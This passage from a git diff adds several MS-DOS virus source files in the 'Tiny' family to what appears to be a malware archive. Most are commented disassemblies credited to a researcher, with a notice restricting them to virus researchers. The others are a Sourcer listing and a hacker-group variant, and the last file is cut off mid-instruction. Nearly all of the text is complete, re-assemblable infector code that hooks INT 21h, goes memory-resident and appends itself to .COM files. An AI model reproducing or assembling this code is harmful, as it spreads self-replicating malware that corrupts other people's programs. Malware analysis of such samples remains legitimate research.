al,2 ; Seek to the end of file + call lseek + + push ax ; Save file length + + mov cl,v_len ; Length of virus body + mov ah,40 ; Append virus to file + int 32 ; Do it + + call lseek1 ; Seek to the file beginning + + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + inc ax + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov ah,40 + int 32 ; Do it + +close: + mov ah,3E ; Close the file + int 32 + +end_exec: + pop es ; Restore used registers + pop ds + pop di + pop dx + pop cx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[32*4] + +lseek1: + mov al,0 ; Lseek to file beginning +lseek: + mov ah,42 ; Lseek either to file beginning or to file end + xor cx,cx + xor dx,dx + int 32 ; Do it + + mov dh,6 ; Put 6 in DH and 4 in CL + mov cl,4 + ret ; Done + +v_end equ $ ; End of virus body + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-156.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-156.asm new file mode 100644 index 00000000..89bcc473 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-156.asm @@ -0,0 +1,182 @@ + page ,132 + name TINY156 + title The 'Tiny' virus, version TINY-156 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-156 +; Disassembled by Vesselin Bontchev, September 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + mov si,0FF ; Determine the start addres of the virus body + add si,[si+2] + + mov di,offset start ; Put the addres of program start on the stack + push di ; Now a Near RET instruction will jump there + + push ax ; Save AX (to keep programs as DISKCOPY happy) + + movsw ; Restore the original first 4 bytes + movsw + + mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h) + xor cx,cx ; ES := 0 + mov es,cx + mov cl,v_len-2 ; CX := virus length + lodsw ; Check if virus is present in memory + scasw + je run ; Just run the program if so + +; Virus not in memory. Install it there: + + dec di ; Adjust DI + dec di + stosw ; Store the first word of the virus body + rep movsb ; Store the rest of the virus + + mov di,32*4 ; Old INT 21h handler will be moved to INT 32h + mov ax,int_21-first4+seg_60 + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler: + + xchg ax,cx +vect_cpy: + xchg ax,cx + xchg ax,word ptr es:[di-(32-21)*4] + stosw + jcxz vect_cpy ; Loop until done + +run: + pop ax ; Restore AX + push ds ; ES := DS + pop es + +; Jump to program start via funny RET instruction: + + ret + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push cx + push dx + push di + push ds + push es + + push cs ; ES := CS + pop es + + mov ax,3D02 ; Open the file for both reading and writting + int 32 + jc end_exec ; Exit on error + xchg ax,bx ; Save the file handle in BX + + mov al,0 + call lseek + + mov ah,3F ; Read the first 4 bytes of the file + mov di,dx ; Save first4 address in DI + push cs ; DS := CS + pop ds + int 32 ; Do it + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + push di ; Save DI + mov al,'M' ; Look for `M' + repne scasb + pop di ; Restore DI + je close ; Exit if file not suitable for infection + + mov al,2 ; Seek to the end of file + call lseek + + push ax ; Save file length + + mov cl,v_len ; Length of virus body + mov ah,40 ; Append virus to file + int 32 ; Do it + + mov al,0 ; Seek to the file beginning + call lseek + + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + inc ax + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov ah,40 + int 32 ; Do it + +close: + mov ah,3E ; Close the file + int 32 + +end_exec: + pop es ; Restore used registers + pop ds + pop di + pop dx + pop cx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[32*4] + +lseek: + mov ah,42 ; Lseek either to file beginning or to file end + xor cx,cx + xor dx,dx + int 32 ; Do it + + mov dh,6 ; Put 6 in DH and 4 in CL + mov cl,4 + ret ; Done + +v_end equ $ ; End of virus body + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-158.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-158.asm new file mode 100644 index 00000000..5cb83f90 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-158.asm @@ -0,0 +1,178 @@ + page ,132 + name TINY158 + title The 'Tiny' virus, version TINY-158 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-158 +; Disassembled by Vesselin Bontchev, July 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + mov si,0FF ; Determine the start addres of the virus body + add si,[si+2] + + mov di,offset start ; Put the addres of program start on the stack + push di ; Now a Near RET instruction will jump there + + push ax ; Save AX (to keep programs as DISKCOPY happy) + + movsw ; Restore the original first 4 bytes + movsw + + mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h) + xor cx,cx ; ES := 0 + mov es,cx + mov cl,v_len-2 ; CX := virus length + lodsw ; Check if virus is present in memory + scasw + je run ; Just run the program if so + +; Virus not in memory. Install it there: + + dec di ; Adjust DI + dec di + stosw ; Store the first word of the virus body + rep movsb ; Store the rest of the virus + + mov di,32*4 ; Old INT 21h handler will be moved to INT 32h + mov ax,int_21-first4+seg_60 + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler: + + xchg ax,cx +vect_cpy: + xchg ax,cx + xchg ax,word ptr es:[di-(32-21)*4] + stosw + jcxz vect_cpy ; Loop until done + +run: + pop ax ; Restore AX + push ds ; ES := DS + pop es + +; Jump to program start via funny RET instruction: + + ret + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push cx + push dx + push di + push ds + push es + + push cs ; ES := CS + pop es + + mov ax,3D02 ; Open the file for both reading and writting + int 32 + jc end_exec ; Exit on error + xchg bx,ax ; Save the file handle in BX + + mov ah,3F ; Read the first 4 bytes of the file + mov cx,4 ; 4 bytes to read + mov dx,seg_60 ; Put them in first4 + mov di,dx ; Save first4 address in DI + push cs ; DS := CS + pop ds + int 32 ; Do it + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + push di ; Save DI + mov al,'M' ; Look for `M' + repne scasb + pop di ; Restore DI + je close ; Exit if file not suitable for infection + + mov ax,4202 ; Seek to the end of file + xor cx,cx + xor dx,dx + int 32 ; Do it + + push ax ; Save file length + + mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h + mov cl,v_len ; Length of virus body + mov ah,40 ; Append virus to file + int 32 ; Do it + + mov ax,4200 ; Seek to the file beginning + xor cx,cx + xor dx,dx + int 32 ; Do it + + mov dx,di ; Point DX at first4 + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + inc ax + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov cl,4 ; Overwrite the first 4 bytes of the file + mov ah,40 + int 32 ; Do it + +close: + mov ah,3E ; Close the file + int 32 + +end_exec: + pop es ; Restore used registers + pop ds + pop di + pop dx + pop cx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[32*4] + +v_end equ $ ; End of virus body + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-159.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-159.asm new file mode 100644 index 00000000..c3550380 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-159.asm @@ -0,0 +1,178 @@ + page ,132 + name TINY159 + title The 'Tiny' virus, version TINY-159 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-159 +; Disassembled by Vesselin Bontchev, July 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + mov si,0FF ; Determine the start addres of the virus body + add si,[si+2] + + mov di,offset start ; Put the addres of program start on the stack + push di ; Now a Near RET instruction will jump there + + push ax ; Save AX (to keep programs as DISKCOPY happy) + + movsw ; Restore the original first 4 bytes + movsw + + mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h) + xor cx,cx ; ES := 0 + mov es,cx + mov cl,v_len-2 ; CX := virus length + lodsw ; Check if virus is present in memory + scasw + je run ; Just run the program if so + +; Virus not in memory. Install it there: + + dec di ; Adjust DI + dec di + stosw ; Store the first word of the virus body + rep movsb ; Store the rest of the virus + + mov di,32*4 ; Old INT 21h handler will be moved to INT 32h + mov ax,int_21-first4+seg_60 ; Offset + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler: + +vect_cpy: + xchg ax,word ptr es:[di-(32-21)*4] + stosw + xchg ax,cx + test ax,ax + jz vect_cpy ; Loop until done + +run: + pop ax ; Restore AX + push ds ; ES := DS + pop es + +; Jump to program start via funny RET instruction: + + ret + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push cx + push dx + push di + push ds + push es + + push cs ; ES := CS + pop es + + mov ax,3D02 ; Open the file for both reading and writting + int 32 + jc end_exec ; Exit on error + xchg bx,ax ; Save the file handle in BX + + mov ah,3F ; Read the first 4 bytes of the file + mov cx,4 ; 4 bytes to read + mov dx,seg_60 ; Put them in first4 + mov di,dx ; Save first4 address in DI + push cs ; DS := CS + pop ds + int 32 ; Do it + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + push di ; Save DI + mov al,'M' ; Look for `M' + repne scasb + pop di ; Restore DI + je close ; Exit if file not suitable for infection + + mov ax,4202 ; Seek to the end of file + xor cx,cx + xor dx,dx + int 32 ; Do it + + push ax ; Save file length + + mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h + mov cl,v_len ; Length of virus body + mov ah,40 ; Append virus to file + int 32 ; Do it + + mov ax,4200 ; Seek to the file beginning + xor cx,cx + xor dx,dx + int 32 ; Do it + + mov dx,di ; Point DX at first4 + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + inc ax + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov cl,4 ; Overwrite the first 4 bytes of the file + mov ah,40 + int 32 ; Do it + +close: + mov ah,3E ; Close the file + int 32 + +end_exec: + pop es ; Restore used registers + pop ds + pop di + pop dx + pop cx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[32*4] + +v_end equ $ ; End of virus body + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-160.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-160.asm new file mode 100644 index 00000000..fff98800 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-160.asm @@ -0,0 +1,178 @@ + page ,132 + name TINY160 + title The 'Tiny' virus, version TINY-160 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-160 +; Disassembled by Vesselin Bontchev, July 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + mov si,0FF ; Determine the start addres of the virus body + add si,[si+2] + + mov di,offset start ; Put the addres of program start on the stack + push di ; Now a Near RET instruction will jump there + + push ax ; Save AX (to keep programs as DISKCOPY happy) + + movsw ; Restore the original first 4 bytes + movsw + + mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h) + xor cx,cx ; ES := 0 + mov es,cx + mov cl,v_len-2 ; CX := virus length + lodsw ; Check if virus is present in memory + scasw + je run ; Just run the program if so + +; Virus not in memory. Install it there: + + dec di ; Adjust DI + dec di + stosw ; Store the first word of the virus body + rep movsb ; Store the rest of the virus + + mov di,32*4 ; Old INT 21h handler will be moved to INT 32h + mov cl,2 ; The vector is 2 words long + mov ax,int_21-first4+seg_60 ; Offset + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler: + +vect_cpy: + xchg ax,word ptr es:[di-(32-21)*4] + stosw + mov ax,es ; Segment + loop vect_cpy ; Loop until done + +run: + pop ax ; Restore AX + push ds ; ES := DS + pop es + +; Jump to program start via funny RET instruction: + + ret + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push cx + push dx + push di + push ds + push es + + push cs ; ES := CS + pop es + + mov ax,3D02 ; Open the file for both reading and writting + int 32 + jc end_exec ; Exit on error + xchg bx,ax ; Save the file handle in BX + + mov ah,3F ; Read the first 4 bytes of the file + mov cx,4 ; 4 bytes to read + mov dx,seg_60 ; Put them in first4 + mov di,dx ; Save first4 address in DI + push cs ; DS := CS + pop ds + int 32 ; Do it + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + push di ; Save DI + mov al,'M' ; Look for `M' + repne scasb + pop di ; Restore DI + je close ; Exit if file not suitable for infection + + mov ax,4202 ; Seek to the end of file + xor cx,cx + xor dx,dx + int 32 ; Do it + + push ax ; Save file length + + mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h + mov cl,v_len ; Length of virus body + mov ah,40 ; Append virus to file + int 32 ; Do it + + mov ax,4200 ; Seek to the file beginning + xor cx,cx + xor dx,dx + int 32 ; Do it + + mov dx,di ; Point DX at first4 + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + inc ax + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov cl,4 ; Overwrite the first 4 bytes of the file + mov ah,40 + int 32 ; Do it + +close: + mov ah,3E ; Close the file + int 32 + +end_exec: + pop es ; Restore used registers + pop ds + pop di + pop dx + pop cx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[32*4] + +v_end equ $ ; End of virus body + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-163.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-163.asm new file mode 100644 index 00000000..9bc8b021 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-163.asm @@ -0,0 +1,126 @@ + +PAGE 59,132 + +; +; +; S +; +; Created: 4-Aug-90 +; Version: +; Passes: 9 Analysis Options on: H +; +; +; + +data_2e equ 1ABh ; (946E:01AB=0) + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +s proc far + +start: + jmp loc_1 ; (0108) + db 0CDh, 20h, 7, 8, 9 +loc_1: + call sub_1 ; (010B) + +s endp + +; +; SUBROUTINE +; + +sub_1 proc near + pop si + sub si,10Bh + mov bp,data_1[si] ; (946E:01A0=0) + add bp,103h + lea dx,[si+1A2h] ; Load effective addr + xor cx,cx ; Zero register + mov ah,4Eh ; 'N' +loc_2: + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_6 ; Jump if carry Set + mov dx,9Eh + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + mov ah,3Fh ; '?' + lea dx,[si+1A8h] ; Load effective addr + mov di,dx + mov cx,3 + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + cmp byte ptr [di],0E9h + je loc_4 ; Jump if equal +loc_3: + mov ah,4Fh ; 'O' + jmp short loc_2 ; (0120) +loc_4: + mov dx,[di+1] + mov data_1[si],dx ; (946E:01A0=0) + xor cx,cx ; Zero register + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov dx,di + mov cx,2 + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + cmp word ptr [di],807h + je loc_3 ; Jump if equal + xor dx,dx ; Zero register + xor cx,cx ; Zero register + mov ax,4202h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + cmp dx,0 + jne loc_3 ; Jump if not equal + cmp ah,0FEh + jae loc_3 ; Jump if above or = + mov ds:data_2e[si],ax ; (946E:01AB=0) + mov ah,40h ; '@' + lea dx,[si+105h] ; Load effective addr + mov cx,0A3h + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + jc loc_5 ; Jump if carry Set + mov ax,4200h + xor cx,cx ; Zero register + mov dx,1 + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov ah,40h ; '@' + lea dx,[si+1ABh] ; Load effective addr + mov cx,2 + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx +loc_5: + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle +loc_6: + jmp bp ;*Register jump +data_1 dw 0 ; Data table (indexed access) + db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0 +sub_1 endp + + +seg_a ends + + + + end start + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-167.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-167.asm new file mode 100644 index 00000000..3b392146 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-167.asm @@ -0,0 +1,177 @@ + page ,132 + name TINY167 + title The 'Tiny' virus, version TINY-167 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-167 +; Disassembled by Vesselin Bontchev, July 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + call v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + pop si ; Determine the start addres of the virus body + add si,[si-2] + +; Save the original first 4 bytes of the infected file on the stack: + + push word ptr ds:[si-4] + push word ptr ds:[si-2] + + push ax ; Save AX (to keep programs as DISKCOPY happy) + + mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h) + xor cx,cx ; ES := 0 + mov es,cx + mov cl,v_len-2 ; CX := virus length + lodsw ; Check if virus is present in memory + scasw + je run ; Just run the program if so + +; Virus not in memory. Install it there: + + dec di ; Adjust DI + dec di + stosw ; Store the first word of the virus body + rep movsb ; Store the rest of the virus + + mov di,32*4 ; Old INT 21h handler will be moved to INT 32h + mov cl,2 ; The vector is 2 words long + mov ax,int_21-first4+seg_60 ; Offset + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler: + +vect_cpy: + xchg ax,word ptr es:[di-(32-21)*4] + stosw + mov ax,es ; Segment + loop vect_cpy ; Loop until done + +run: + mov di,offset start ; Point DI at program start + pop ax ; Restore AX + pop word ptr ds:[di+2] ; Restore the original first 4 bytes + pop word ptr ds:[di] ; of the file + push ds ; ES := DS + pop es + jmp di ; Go + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push cx + push dx + push di + push ds + push es + + push cs ; ES := CS + pop es + + mov ax,3D02 ; Open the file for both reading and writting + int 32 + jc end_exec ; Exit on error + xchg bx,ax ; Save the file handle in BX + + mov ah,3F ; Read the first 4 bytes of the file + mov cx,4 ; 4 bytes to read + mov dx,seg_60 ; Put them in first4 + mov di,dx ; Save first4 address in DI + push cs ; DS := CS + pop ds + int 32 ; Do it + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + push di ; Save DI + mov al,'M' ; Look for `M' + repne scasb + pop di ; Restore DI + je close ; Exit if file not suitable for infection + + mov ax,4202 ; Seek to the end of file + xor cx,cx + xor dx,dx + int 32 ; Do it + + push ax ; Save file length + + mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h + mov cl,v_len ; Length of virus body + mov ah,40 ; Append virus to file + int 32 ; Do it + + mov ax,4200 ; Seek to the file beginning + xor cx,cx + xor dx,dx + int 32 ; Do it + + mov dx,di ; Point DX at first4 + mov al,0E8 ; Near CALL opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + inc ax + stosw ; Form the CALL's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov cl,4 ; Overwrite the first 4 bytes of the file + mov ah,40 + int 32 ; Do it + +close: + mov ah,3E ; Close the file + int 32 + +end_exec: + pop es ; Restore used registers + pop ds + pop di + pop dx + pop cx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[32*4] + +v_end equ $ ; End of virus body + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-198.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-198.asm new file mode 100644 index 00000000..8d97a6c2 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-198.asm @@ -0,0 +1,199 @@ + page ,132 + name TINY198 + title The 'Tiny' virus, version TINY-198 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-198 +; Disassembled by Vesselin Bontchev, July 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-v_entry + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +v_entry: + call self ; Determine the start addres of the virus body +self: + pop si + sub si,3 + + push ax ; Save AX (to keep programs as DISKCOPY happy) + +; Check whether the virus is already in memory and just run the program if so: + + mov ah,0E9 + int 21 + + mov di,seg_60 ; Point ES:DI at 0000:0600h (i.e, segment 60h) + xor cx,cx ; ES := 0 + mov es,cx + mov cl,v_len ; CX := virus length + rep movsb ; Move the virus body there + +; Transfer control to cont: by PUSHing its address +; on the stack and executing RETF: + + push es + mov ax,cont-v_entry+seg_60 + push ax + retf + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +; Resume execution from here (but already in segment 60h): + +cont: + +; Install new INT 21h handler and move the old one at INT 32h: + + mov di,21*4 + mov cl,2 + mov ax,int_21-v_entry+seg_60 + cld +lp: + push word ptr es:[di] ; Get old handler's address + pop word ptr es:[di+(32-21)*4] ; Move it at INT 32h + stosw ; Install the new one + mov ax,cs + loop lp ; Loop until done + +; Save the original first 4 bytes of the infected program on the stack: + + push word ptr cs:[first4-v_entry+seg_60] + push word ptr cs:[first4+2-v_entry+seg_60] + +run_pgm: + mov di,offset start ; Point DI at program's start + pop word ptr [di+2] ; Restore the first 4 bytes of the program + pop word ptr [di] + pop ax ; Restore the original value of AX + push ds + push ds ; ES := DS + pop es + push di ; Push 100h on the stack + retf + +mem_chk: + +; Push the original first 4 bytes of the infected program on the stack: + + push word ptr [si+first4-v_entry] + push word ptr [si+first4+2-v_entry] + jmp run_pgm ; And run the original program + +int_21: ; New INT 21h handler + cmp ah,0E9 ; Memory check? + je mem_chk ; If infected, run the original program + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push cx + push dx + push di + push ds + push es + + push cs ; ES := CS + pop es + + mov ax,3D02 ; Open the file for both reading and writting + int 32 + jc end_exec ; Exit on error + mov bx,ax ; Save the file handle in BX + + mov ah,3F ; Read the first 4 bytes of the file + mov cx,4 ; 4 bytes to read + mov dx,first4-v_entry+seg_60 ; Put them in first4 + mov di,dx ; Save first4 address in DI + push cs ; DS := CS + pop ds + int 32 ; Do it + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + push di ; Save DI + mov al,'M' ; Look for `M' + repne scasb + pop di ; Restore DI + je close ; Exit if file not suitable for infection + + mov ax,4202 ; Seek to the end of file + xor cx,cx + xor dx,dx + int 32 ; Do it + + push ax ; Save file length + + mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h + mov cl,v_len ; Length of virus body + mov ah,40 ; Append virus to file + int 32 ; Do it + + mov ax,4200 ; Seek to the file beginning + xor cx,cx + xor dx,dx + int 32 ; Do it + + mov dx,di ; Point DX at first4 + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + sub ax,3 ; Subtract 3 (first instruction length) + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov cl,4 ; Overwrite the first 4 bytes of the file + mov ah,40 + int 32 ; Do it + +close: + mov ah,3E ; Close the file + int 32 + +end_exec: + pop es ; Restore used registers + pop ds + pop di + pop dx + pop cx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[32*4] + +v_end equ $ ; End of virus body + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-b.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-b.asm new file mode 100644 index 00000000..4c3b3726 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-b.asm @@ -0,0 +1,102 @@ + PAGE ,132 +tinyv SEGMENT BYTE PUBLIC 'code' + ASSUME CS:tinyv + ASSUME SS:tinyv + ASSUME DS:tinyv +H00000 DB 0 +H00001 DB 255 DUP(?) +program PROC FAR + ASSUME ES:tinyv +begin: + JMP pgstart ; start program +exlbl LABEL BYTE + db 0CDh, 20h, 7, 8, 9 +pgstart: + CALL tinyvir +mnprg PROC NEAR +tinyvir: + POP SI ; get SI for storage + SUB SI,offset tinyvir ; reset SI to virus start + MOV BP,[SI+blnkdat] ; store SI in BP for return + ADD BP,offset exlbl ; Add to get original offset + LEA DX,[SI+fspec] ; get filespec (*.COM) + SUB CX,CX ; || (clear regs) + MOV AH,4EH ; || (find files) +mainloop: ; \||/ + INT 21H ; ----\/---- + JC ack ; no more files found, terminate virus + MOV DX,009EH ; set file name pointer + MOV AX,3D02H ; open file + INT 21H ; do it! + MOV BX,AX ; move file handle to BX + MOV AH,3FH ; read file + JMP whatever +ack: + JMP nofile +whatever: + LEA DX,[SI+endprog] ; load end of program (as buffer pntr) + MOV DI,DX ; set Dest Index to area for buffer (?) + MOV CX,0003H ; read 3 bytes + INT 21H ; do it! + CMP BYTE PTR [DI],0E9H ; check for JMP at start + JE infect ; If begins w/JMP, Infect +nextfile: + MOV AH,4FH ; set int 21 to find next file + JMP mainloop ; next file, do it! +infect: + MOV DX,[DI+01H] ; set # of bytes to move + MOV 